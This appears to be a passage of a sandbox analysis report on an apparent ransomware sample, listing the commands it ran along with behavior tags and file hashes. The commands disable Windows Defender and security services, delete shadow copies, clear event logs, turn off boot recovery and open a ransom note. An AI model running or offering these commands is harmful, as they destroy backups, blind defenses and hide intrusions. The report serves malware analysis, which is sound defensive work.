C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:592
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:980
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:836
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:396
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:968
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1440
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1264
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1100
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1340
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1812
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1984
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1856
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1960
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:548
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1740
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1160
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1552
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1324
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:976
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:240
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1212
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1440
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1328
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1040
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1724
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1916
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:280
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:360
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1508
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1572
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:320
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:396
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1144
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1032
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1308
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1728
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1920
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1356
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1988
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:436
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1152
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:984
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1712
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1816 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2016
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1532 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵PID:1396
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:748 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:968 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2072 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2096 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2116
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2136 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2168 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252 -
C:\Windows\system32\notepad.exenotepad.exe C:\a84r_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2620 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe"2⤵PID:2628
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2652
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD508d50189ef53f358530d6d5e8bdc4c01
SHA10742c1433d1c07f3c5ffa207af4b2cf94f052e70
SHA2560246831ab1fd77f879fc749fb07a7ae55d47f720f2a7724056e37e955bb79ff6
SHA5123bb1850cf33b1fe0e68a7bca0694e34a058f07204f83161c4785cf9ef9cd9776e34a1baeb0aa36f065b2d699aab2654ad4fd31a25f5bd12c9db1a5187e16bd9e
-
MD5
5f00eabb52cff99b488fd8202cb2ad3a
SHA1cd7d4f0d9fff26b1611cb2ef2f9c82068f5e9578
SHA256282c1b1267b62b839a830fa1e36cea4a79d65ed73d696050f3478fe514d44ba2
SHA512d0c9bc686b17a8faa66cd08ca4c80deac20ca93e5b89b9750ed6a4da2cd426ca5901ef44ba6930cb19e386f30c56fc11a6a6bfd9f40e88fa77d0c1fe8e2355ee